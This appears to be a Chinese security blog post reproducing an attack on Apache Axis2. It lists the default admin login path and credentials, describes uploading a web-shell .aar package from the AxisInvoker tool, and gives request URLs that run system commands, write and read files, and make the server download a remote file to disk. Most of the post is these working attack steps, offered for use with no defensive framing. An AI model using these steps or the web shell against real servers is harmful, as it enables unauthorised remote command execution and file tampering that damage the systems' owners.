spaceman'blog > Apache Axis2 后台文件上传

Apache Axis2 后台文件上传

2021-03-15

getshell

Apache Axis2 后台文件上传

简介

Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。

image-20210315012427121

漏洞复现

默认后台路径:/axis2-admin/login

默认账号密码:admin/axis2

工具下载地址: https://github.com/CaledoniaProject/AxisInvoker

访问后台地址,使用默认密码成功登录, 点击Upload Service上传aar包进行命令执行

image-20210315012533689

上传工具中 build目录中的 aar 包,成功上传

image-20210315012701394

image-20210315012723736

命令执行

windows 或 linux 均可正常执行

根据工具md文档操作如下

运行命令:

1
http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/exec?cmd=whoami

image-20210315012948426

写文件:

1
http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/write?path=c:\566.txt&content=123

image-20210315011245808

读取文件:

1
http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/read?path=c:\566.txt

image-20210315011503080

下载文件并将其保存

1
http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\123.txt

image-20210315011728859

image-20210315011808668